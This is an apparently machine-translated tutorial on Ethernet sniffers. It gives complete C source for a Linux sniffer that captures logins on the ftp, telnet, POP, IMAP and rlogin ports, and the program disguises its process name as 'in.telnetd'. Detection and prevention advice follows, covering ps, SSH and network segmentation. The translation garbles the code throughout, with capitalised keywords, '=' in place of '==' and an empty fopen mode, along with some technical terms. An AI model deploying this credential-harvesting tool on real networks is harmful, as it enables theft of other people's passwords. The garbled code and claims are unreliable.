Sniffer is a common method for collecting useful data. The data can be user accounts and passwords, or commercial confidential data. In order to have an in-depth understanding of the working principle of sniffer, Section 2 provides a sniffer source program and explains it. Section 3 describes how to detect and prevent sniffer.
Section 1 Introduction to Sniffer
What is Ethernet sniffing?
Ethernet sniffing refers to listening for packets transmitted on an Ethernet device to discover packets of interest. If a qualified package is found, store it in a log file. These conditions are usually set to include a package with the word "username" or "password.
It aims to put the network layer in the promiscuous mode to do something. The Promiscuous mode means that all devices on the network listen to the data transmitted on the bus, not just their own data. According to the basic introduction to the working principle of Ethernet in Chapter 2, you can know that when a device sends data to a target, it broadcasts data over Ethernet. A device connected to the Ethernet BUS receives data at any time. However, it only transmits its own data to applications on the computer.
With this, you can set the network connection of a computer to accept data on all Ethernet buses to implement sniffer.
Sniffer usually runs on a vro or a host with the vro function. In this way, you can monitor a large amount of data. Sniffer is a second-level attack. Generally, attackers have already entered the target system and then use sniffer to obtain more information.
In addition to passwords or user names, sniffer can also obtain more information, such as other important information and financial information sent online. Sniffer can get almost any packets transmitted over Ethernet.
There are many sniffer programs running on different platforms.
Linux tcpdump, dos ethload, The Gobbler, LanPatrol, LanWatch, Netmon, Netwatch, Netzhack
The above programs can be found on the Internet.
Using the sniffer program or writing a powerful sniffer program requires some network knowledge. If this program is not properly set, you cannot find the required information from a large amount of data.
Generally, the sniffer program only looks at the First-bytes of data in a data packet and can find information such as the password and user name.
Section 2: a sniffer source program
The following is a source program for Linux Ethernet sniffer. This program can be enhanced as needed.
/* Linux sniffer. c. The program has been debugged on Red Hat 5.2 */
# Include <string. h>
# Include <ctype. h>
# Include <stdio. h>
# Include <netdb. h>
# Include <sys/file. h>
# Include <sys/time. h>
# Include <sys/socket. h>
# Include <sys/ioctl. h>
# Include <sys/signal. h>
# Include <net/if. h>
# Include <arpa/inet. h>
# Include <netinet/in. h>
# Include <netinet/ip. h>
# Include <netinet/tcp. h>
# Include <netinet/if_ether.h>
Int openintf (char *);
Int read_tcp (int );
Int filter (void );
Int print_header (void );
Int print_data (int, char *);
Char * hostlookup (unsigned long int );
Void clear_victim (void );
Void cleanup (int );
Struct etherpacket
{
Struct ethhdr eth;
Struct iphdr ip address;
Struct tcphdr tcp;
Char buff [8192];
} Ep;
Struct
{
Unsigned long saddr;
Unsigned long daddr;
Unsigned short sport;
Unsigned short dport;
Int bytes_read;
Char active;
Time_t start_time;
} Victim;
Struct iphdr * ip address;
Struct tcphdr * tcp;
Int s;
FILE * fp;
# Define CAPTLEN 512
# Define TIMEOUT 30
# Define TCPLOG "tcp. log"
Int openintf (char * d)
{
Int fd;
Struct ifreq ifr;
Int s;
Fd = socket (AF_INET, SOCK_PACKET, htons (0x800 ));
If (fd <0)
{
Perror ("cant get SOCK_PACKET socket ");
Exit (0 );
}
Strcpy (ifr. ifr_name, d );
S = ioctl (fd, SIOCGIFFLAGS, & ifr );
If (s <0)
{
Close (fd );
Perror ("cant get flags ");
Exit (0 );
}
Ifr. ifr_flags | = IFF_PROMISC;
S = ioctl (fd, SIOCSIFFLAGS, & ifr );
If (s <0) perror ("can not set promiscuous mode ");
Return fd;
}
Int read_tcp (int s)
{
Int x;
While (1)
{
X = read (s, (struct etherpacket *) & ep, sizeof (ep ));
If (x> 1)
{
If (filter () = 0) continue;
X = x-54;
If (x <1) continue;
Return x;
}
}
}
Int filter (void)
{
Int p;
P = 0;
If (ip-> protocol! = 6) return 0;
If (victim. active! = 0)
If (victim. bytes_read> CAPTLEN)
{
Fprintf (fp, "\ n ----- [CAPLEN Exceeded] \ n ");
Clear_victim ();
Return 0;
}
If (victim. active! = 0)
If (time (NULL)> (victim. start_time + TIMEOUT ))
{
Fprintf (fp, "\ n ----- [Timed Out] \ n ");
Clear_victim ();
Return 0;
}
If (ntohs (tcp-> dest) = 21) p = 1;/* ftp */
If (ntohs (tcp-> dest) = 23) p = 1;/* telnet */
If (ntohs (tcp-> dest) = 110) p = 1;/* pop3 */
If (ntohs (tcp-> dest) = 109) p = 1;/* pop2 */
If (ntohs (tcp-> dest) = 143) p = 1;/* imap2 */
If (ntohs (tcp-> dest) = 513) p = 1;/* rlogin */
If (ntohs (tcp-> dest) = 106) p = 1;/* poppasswd */
If (victim. active = 0)
If (p = 1)
If (tcp-> syn = 1)
{
Victim. saddr = ip-> saddr;
Victim. daddr = ip-> daddr;
Victim. active = 1;
Victim. sport = tcp-> source;
Victim. dport = tcp-> dest;
Victim. bytes_read = 0;
Victim. start_time = time (NULL );
Print_header ();
}
If (tcp-> dest! = Victim. dport) return 0;
If (tcp-> source! = Victim. sport) return 0;
If (ip-> saddr! = Victim. saddr) return 0;
If (ip-> daddr! = Victim. daddr) return 0;
If (tcp-> rst = 1)
{
Victim. active = 0;
Alarm (0 );
Fprintf (fp, "\ n ----- [RST] \ n ");
Clear_victim ();
Return 0;
}
If (tcp-> fin = 1)
{
Victim. active = 0;
Alarm (0 );
Fprintf (fp, "\ n ----- [FIN] \ n ");
Clear_victim ();
Return 0;
}
Return 1;
}
Int print_header (void)
{
Fprintf (fp, "\ n ");
Fprintf (fp, "% s =>", hostlookup (ip-> saddr ));
Fprintf (fp, "% s [% d] \ n", hostlookup (ip-> daddr), ntohs (tcp-> dest ));
}
Int print_data (int datalen, char * data)
{
Int I = 0;
Int t = 0;
Victim. bytes_read = victim. bytes_read + datalen;
For (I = 0; I! = Datalen; I ++)
{
If (data [I] = 13) {fprintf (fp, "\ n"); t = 0 ;}
If (isprint (data [I]) {fprintf (fp, "% c", data [I]); t ++ ;}
If (t> 75) {t = 0; fprintf (fp, "\ n ");}
}
}
Main (int argc, char ** argv)
{
Sprintf (argv [0], "% s", "in. telnetd ");
S = openintf ("eth0 ");
Ip = (struct iphdr *) (unsigned long) & ep. ip)-2 );
Tcp = (struct tcphdr *) (unsigned long) & ep. tcp)-2 );
Signal (SIGHUP, SIG_IGN );
Signal (SIGINT, cleanup );
Signal (SIGTERM, cleanup );
Signal (SIGKILL, cleanup );
Signal (SIGQUIT, cleanup );
If (argc = 2) fp = stdout;
Else fp = fopen (TCPLOG, "");
If (fp = NULL) {fprintf (stderr, "cant open log \ n"); exit (0 );}
Clear_victim ();
For (;;)
{
Read_tcp (s );
If (victim. active! = 0) print_data (htons (ip-> tot_len)-sizeof (ep. ip)-sizeof (ep. tcp), ep. buff-2 );
Fflush (fp );
}
}
Char * hostlookup (unsigned long int in)
{
Static char blah [1024];
Struct in_addr I;
Struct hostent * he;
I. s_addr = in;
He = gethostbyaddr (char *) & I, sizeof (struct in_addr), AF_INET );
If (he = NULL)
Strcpy (blah, inet_ntoa (I ));
Else
Strcpy (blah, he-> h_name );
Return blah;
}
Void clear_victim (void)
{
Victim. saddr = 0;
Victim. daddr = 0;
Victim. sport = 0;
Victim. dport = 0;
Victim. active = 0;
Victim. bytes_read = 0;
Victim. start_time = 0;
}
Void cleanup (int sig)
{
Fprintf (fp, "Exiting... \ n ");
Close (s );
Fclose (fp );
Exit (0 );
}
The following is an introduction to the above program. The structure etherpacket defines a data packet. Ethhdr, iphdr, and tcphdr are three structures used to define the formats of Ethernet frames, IP data headers, and TCP Data headers.
They are defined in the header file as follows:
Struct ethhdr
{
Unsigned char h_dest [ETH_ALEN];/* destination eth addr */
Unsigned char h_source [ETH_ALEN];/* source ether addr */
Unsigned short h_proto;/* packet type ID field */
};
Struct iphdr
{
# If _ BYTE_ORDER = _ LITTLE_ENDIAN
U_int8_t ihl: 4;
U_int8_t version: 4;
# Elif _ BYTE_ORDER = _ BIG_ENDIAN
U_int8_t version: 4;
U_int8_t ihl: 4;
# Else
# Error "Please fix <bytesex. h>"
# Endif
U_int8_t tos;
U_int16_t tot_len;
U_int16_t id;
U_int16_t frag_off;
U_int8_t ttl;
U_int8_t protocol;
U_int16_t check;
U_int32_t saddr;
U_int32_t daddr;
/* The options start here .*/
};
Struct tcphdr
{
U_int16_t source;
U_int16_t dest;
U_int32_t seq;
U_int32_t ack_seq;
# If _ BYTE_ORDER = _ LITTLE_ENDIAN
U_int16_t res1: 4;
U_int16_t doff: 4;
U_int16_t fin: 1;
U_int16_t syn: 1;
U_int16_t rst: 1;
U_int16_t psh: 1;
U_int16_t ack: 1;
U_int16_t urg: 1;
U_int16_t res2: 2;
# Elif _ BYTE_ORDER = _ BIG_ENDIAN
U_int16_t doff: 4;
U_int16_t res1: 4;
U_int16_t res2: 2;
U_int16_t urg: 1;
U_int16_t ack: 1;
U_int16_t psh: 1;
U_int16_t rst: 1;
U_int16_t syn: 1;
U_int16_t fin: 1;
# Else
# Error "Adjust your <bits/endian. h> defines"
# Endif
U_int16_t window;
U_int16_t check;
U_int16_t urg_ptr;
};
For the specific meanings of the above structure, see the relevant content in Chapter TCP/IP protocol introduction. Next, a structure variable victim is defined.
Next, let's take a look at the int openintf (char * d) function, which is used to open a network interface. In main, eth0 is used as the parameter to call this function. The following structure is used in this function:
Struct ifreq
{
# Define IFHWADDRLEN 6
# Define IFNAMSIZ 16
Union
{
Char ifrn_name [IFNAMSIZ];/* Interface name, e.g. "en0 ".*/
} Ifr_ifrn;
Union
{
Struct sockaddr ifru_addr;
Struct sockaddr ifru_dstaddr;
Struct sockaddr ifru_broadaddr;
Struct sockaddr ifru_netmask;
Struct sockaddr ifru_hwaddr;
Short int ifru_flags;
Int ifru_ivalue;
Int ifru_mtu;
Struct ifmap ifru_map;
Char ifru_slave [IFNAMSIZ];/* Just fits the size */
_ Caddr_t ifru_data;
} Ifr_ifru;
};
This structure is called the Interface request structure, which is used for calling I/O input and output. All interface I/O outputs must have a parameter. This parameter starts with ifr_name, and the following parameters vary depending on the network interface used.
If you want to see which network interfaces your computer has, use the ifconfig command. Generally, you will see two interfaces lo0 and eth0. The domain meanings in the ifreq structure correspond to the ifconfig output one by one. Here, the program uses eth0 as ifr_name. Then, this function sets this network interface to the promiscuous mode. Remember that sniffer works in this mode.
Let's look at the read_tcp function, which is used to read TCP data packets and send them to the filter for processing. The Filter function processes the data packets read above.
The next program is to output data to the file.
The function clearup is used to make a record in the file when the program exits and close the file. Otherwise, the record you just made is gone.
Section 3 how to find an sniffer on a network
One simple answer is that you cannot find it. Because they leave no trace at all.
There is only one way to look at all the programs currently running on the computer. But this is usually not reliable, but you can control which program can run on your computer.
Run the following command on a Unix system:
Ps-aux
Or:
Ps-augx
This command lists all current processes, the users who start these processes, their CPU usage time, memory usage, and so on. In Windows, press Ctrl + Alt + Del to view the task list. However, Sniffer with high programming skills won't appear here even if it is running. Another method is to search for suspicious files in the system. However, intruders may use their own programs, which makes it quite difficult to find sniffer.
There are also many tools that can be used to see if your system will be in promiscuous mode. To check whether a sniffer is running.
How to Prevent sniffer
It is not difficult to prevent sniffer. There are many optional methods. But the key is to have overhead. So the question is whether you are willing to spend money.
What you are most concerned about is the transmission of sensitive data, such as user IDs or passwords. Some data is not processed and can be obtained once it is sniffer. The solution to these problems is encryption.
Encryption
We will introduce the following SSH, also known as Secure Shell. SSH is a protocol that provides Secure Communication in applications. It is built on the client/server model. The port allocated by the SSH server is 22. The connection is established by using an algorithm from RSA. After authorization is complete, the next communication data is encrypted using IDEA technology. This is usually strong and suitable for non-secret and non-classic communication.
SSH was later developed into F-SSH, providing high-level, military-level encryption of the communication process. It provides the most universal encryption for TCP/IP network communication.
If a site uses a F-SSH, the user name and password are not very important. Currently, no one has broken through this encryption method. Even sniffer, the collected information will no longer be valuable. Of course, the most important thing is how to use it.
Both SSH and F-SSH have commercial or free software versions. NT are available.
Are there other methods?
Another option is to use a security topology. This sounds simple, but the implementation is very costly.
Have you ever played an intelligent game? It usually consists of a series of numbers. The goal of the game is to arrange numbers and arrange them in descending order with the least steps. When dealing with network topologies, it's just like playing this game.
The following are some rules:
A network segment must have enough reason to trust another network segment. Network segments should be designed based on the trust relationship between your data, rather than the hardware needs.
This is created. Let's take a look. First: a network segment is composed of only computers that can trust each other. Usually they are in the same room or in the same office. For example, your financial information should be fixed in a part of the building.
Note that each machine is connected to the Hub through a hard connection. The Hub is connected to the vswitch. Because the network is segmented, packets can only be sniffer on this network segment. The remaining CIDR blocks cannot be sniffer.
All problems are attributed to trust. To communicate with other computers, a computer must trust that computer. As a system administrator, your job is to determine a way to minimize the trust relationship between computers. In this way, we have built a framework that tells you when to place a sniffer, where it is, who put it, and so on.
If your LAN is connected to the INTERNET, it is not enough to use a firewall. Intruders can scan behind a firewall and detect running services. What you need to care about is what an intruder can get when he enters the system. You must consider how long the trust relationship is. For example, assume that your WEB server trusts A computer. So how many computers are trusted by. How many computers are trusted by these computers? In one sentence, it is the computer that determines the minimum trust relationship. In the trust relationship, any previous computer on this computer may attack your computer and succeed. Your task is to ensure that once an sniffer occurs, it is only valid for the minimum range.
Sniffer is often used by attackers to collect useful information after they intrude into the system. Therefore, Preventing System breakthroughs is critical. The system security administrator should conduct regular security tests on the managed networks to prevent security risks. At the same time, you must control the number of users with considerable permissions. Remember that many attacks often come from inside the network.